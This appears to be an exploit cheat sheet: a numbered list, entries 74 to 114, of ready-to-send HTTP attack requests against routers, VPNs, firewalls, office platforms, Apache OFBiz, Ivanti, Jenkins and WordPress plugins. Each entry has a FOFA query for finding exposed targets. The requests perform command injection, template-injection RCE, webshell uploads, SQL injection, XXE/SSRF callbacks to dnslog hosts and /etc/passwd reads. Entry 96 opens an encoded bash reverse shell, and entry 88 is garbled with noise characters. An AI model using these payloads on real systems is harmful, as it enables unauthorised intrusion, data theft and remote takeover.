Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec mobile campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (Baiwei) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (Suda) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is shown below; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (Anheng) Mingyu security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

7 P# A9 U' Q  L5 Y88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
  a$ B" K/ [! i- C& A9 ?FOFA:title="明御安全网关"4 j7 A1 r# z5 }7 ^
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1. V: o8 w0 j6 l. q  k& {
Host: x.x.x.xx.x.x.x
/ I/ ]1 @( Q) S" {& x! AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* y% n# F9 k! EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 B0 h) s7 h; j! m; `- mAccept-Encoding: gzip, deflate
$ |2 X/ W6 A. l& q$ |$ o% Y4 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 n) R4 I. j) s* i. f
Connection: close* |* Y6 f5 A' u( y# m
' r4 H! O0 M: |8 y3 r: Q3 ?
, U& c- k5 J. v' l
/astdfkhl.php5 `# F+ B* s5 k

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin Legendsec SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen (网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache-OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of an XML document; the XML is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
